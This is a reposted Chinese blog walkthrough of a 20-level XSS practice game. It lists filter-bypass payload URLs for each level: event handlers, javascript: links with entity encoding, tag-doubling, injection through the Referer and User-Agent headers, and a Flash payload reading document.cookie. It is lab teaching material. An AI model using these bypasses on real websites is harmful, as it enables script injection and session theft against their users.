html中%3ca%3e%3c a%3e,xss挑战 1

说明

xss的常规思路:

1.先找注入点

2.再找输出点

3.根据输出点位置,格式,显示不断重新尝试有效载荷

LEVEL-1

16043a804361763f2973e4cf7b33e004.png

19bd66920bea84a66da9271da58eb4ab.png

payload

http://test.ctf8.com/level1.php?name=%3Cscript%3Ealert(/xss/)%3C/script%3E

http://test.ctf8.com/level1.php?name=%3Csvg/οnlοad=alert(1)%3E

http://test.ctf8.com/level1.php?name=%3Cimg%20src=1%20οnerrοr=alert(1)%3E

http://test.ctf8.com/level1.php?name=%%3Ca%20href=%22javascript:alert(1)%22%3Etest%3C/a%3E

143b74bf06b4d232dfb36b437c1e3dcb.png

LEVEL-2

a4ba43da7dd0fe5baeeef6e7b62897ef.png

293b1b5839f7d77e0cc1b59342f4348a.png

ba52d52fec34573d5d98cc69babd142b.png

显而易见,上面尖括号被过滤了,而下面却没有

PHP中 ' 中的变量不会执行

"中的变量执行。只要闭合双引号即可

payload

http://test.ctf8.com/level2.php?keyword=%22%3E%3Cimg%20src=1%20οnerrοr=alert(1)%3E

http://test.ctf8.com/level4.php?keyword="οnclick="window.alert()

e8f1b50ca7f37b5964824644925e7ac8.png

LEVEL-3

79edcbff8e406c73ce7acf6c899117e2.png

f852bdbdf5056be7ec0e67bba4220222.png

htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。

预定义的字符是:

& (和号)成为 &

" (双引号)成为 "

' (单引号)成为 '

< (小于)成为 <

> (大于)成为 >

payload

http://test.ctf8.com/level3.php?keyword=%27onclick%3D%27window.alert%28%29&submit=%E6%90%9C%E7%B4%A2

e7b7a723ee01d4fdb83b4d8d82540824.png

LEVEL-4

82f1f44bae20303164dbcdf15eeec05d.png

482b78fbecba48758b92ee8aa9971f46.png

payload

http://test.ctf8.com/level4.php?keyword=%22οnmοuseοver=%22alert(1)

4fcc97cbc8a2150596b5fbdd2114a023.png

LEVEL-5

28ab56e117f0f34dde4fb1e7af5fd565.png

da7ec5da33432fa9c2697faf88e9b074.png

但是这串代码没有过滤字符,那么我们可以使用标签的href属性构造payload进行弹窗

payload

http://test.ctf8.com/level5.php?keyword=%22%3E%20%3Ca%20href=%22javascript:alert(1)%22%3Exss%3C/a%3E

0e43fd7b55b37cc6ad25c26ffaaaa061.png

LEVEL-6

b48c812a617b7b50e3952f4d6f05a2fe.png

566efea2f3bdf6a0b5c2ca4bf6c1c64f.png

payload

http://test.ctf8.com/level6.php?keyword=%22ONclick%3D%22window.alert%28%29&submit=%E6%90%9C%E7%B4%A2

2cd98499bff8bcd626e2659c670d1a8f.png

LEVEL-7

f59f7ada91ff5d87a3935e93a212df4a.png

e308a38933530063479ccfff67ac4d5b.png

payload

http://test.ctf8.com/level7.php?keyword=%22%3E%3CScrscriptipt%3Ealert(1)%3C/Scriscriptpt%3E

05f5396b4997a19cdb77b805e71a4936.png

LEVEL-8

10137ac641f20536726785e1ee78d93a.png

f3042168c86ede5081c3d9c191a5e3cc.png

Javascript:伪协议后面可以使用URL编码。

如:click me可成功执行弹窗。

可用img就不行:1

因为href属性会跳转到其中的URL,而会进行URL解码,onerror属性只会执行JS,不跳转同时后面的url编码可以再做一次entity(HTML实体)编码:

click me

payload

http://test.ctf8.com/level8.php?keyword=javascri%26%23x0070%3Bt%3Aalert%28%29&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5

c6b87143767aa1f7cbcb698888cc3255.png

LEVEL-9

f5cad3f3c5be898f238bc4e8c42bda5c.png

803e5469aeef672da030f3919fb170da.png

只要让它检测到http,却不能起到作用就可以了,所以可以用注释

payload

http://test.ctf8.com/level9.php?keyword=javascri%26%23x0070%3Bt%3Aalert%281%29%2F*http%3A%2F%2Fwww.baidu.com*%2F&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5

376eb136890f8f61e4907e9afde496d7.png

LEVEL-10

7774ac18cbc42875013e04f39f1e4ce4.png

aaaf89086a45c409efd28672de33c955.png

payload

http://test.ctf8.com/level10.php?keyword%20=%20test&t_sort=%22type=%22text%22%20onclick%20=%20%22alert(1)

6dc834af414968a7c3280e0f5f35ef22.png

LEVEL-11

69edcaf3271480c3551b6c504c31f1ac.png

e00d9743ac6dadc28f9e60291eb8c771.png

04183bcc49556ae409e02b79148cc5e1.png

payload

Referer: "οnclick=alert(1) type="text" //所添加的Referer头部

a271389a080235738e9770d9205cb588.png

LEVEL-12

7bbc0736a5a08ad127fcd3be1a1a62d2.png

28ad2cd4ddb8aa205638a40f9e686518.png

payload

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 " οnclick=alert(1) type="text

24f445c339ab2092896f97fb51c1bd70.png

68ae728c045c58316f6397aea75030da.png

LEVEL-13

0c46329378b6eae0b7e0fbcd3996930f.png

90341fc07399c1c713a77fe0c3d4447c.png

028930863d36e7d2e0e8e97f07dffb31.png

payload

user=call+me+maybe%3F " οnclick=alert(1) type="text"

138fb137d2071a507eede65321a40cd1.png

LEVEL-14

e02d4ae82706961eef19baab3a12298b.png

75af35000fb0263ab2fbbb55fddcf67b.png

查看源码,点击

4eb451a17f10f7e967fcc321e2af85d0.png

这关目前做不了,我再看看

LEVEL-15

2e2662a589fdc8c4d879cf61e37fbb99.png

c419c5447ae928b89e58852c3af0355f.png

payload

http://127.0.0.1/xss练习小游戏/level15.php?src='level1.php?name=x'

82d87fe8ab27d019f3f4812be9d6a4e1.png

LEVEL-16

c3444186df9034a2d5523b260c528290.png

dc6623ff9172a16e6baaffbfcfdffc24.png

payload

http://127.0.0.1/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F/level16.php?keyword=%3Cimg%0dsrc=1%0dοnerrοr=alert()%3E

2001c52df094d6207b4810d480f3dd60.png

LEVEL-17

b8654b01f3efcf5f95c95a16f68a50f8.png

3b6fb57c20a8207251a87b5ed794fffe.png

过滤了尖括号和双引号,用on事件触发

payload

http://127.0.0.1/xss练习小游戏/level17.php?arg01=a&arg02=b%20οnclick=alert(1)

f03a9eaa16743eaff1df73d8bd4cf909.png

LEVEL-18

6162c605ea2ef7eb6d84872b867c4e31.png

d01cb1719dc5e9e70f605a614a63f98f.png

payload

http://127.0.0.1/xss练习小游戏/level18.php?arg01=a&arg02=%20οnclick=alert(1)

bb5df350ff3a0bf455aa3a02efec56b0.png

LEVEL-19

19,20均为flash分析

需要

7bbbbd3d5e4ae4d8b42e1a857560939e.png

6ae680bd16894ec08c367568c45d12fa.png

b95940cfa2ac73ace31486f8d8abfa0b.png

payload

http://127.0.0.1/xss练习小游戏/level19.php?arg01=version&arg02=%3Ca%20href=%22javascript:alert(document.domain)%22%3Exss_by_SST%3C/a%3E

25414d377061cc50553bda76b6722ec9.png

LEVEL-20

3c50dbbc3b0ea8865498754e8fcc276a.png

具体可以参考freebuf

确实很少碰到,算flash中xss少的了

payload

http://127.0.0.1/xss练习小游戏/level20.php?arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height

标签:xss,http,LEVEL,挑战,test,php,com,payload

来源: https://www.cnblogs.com/howtime/p/12500295.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值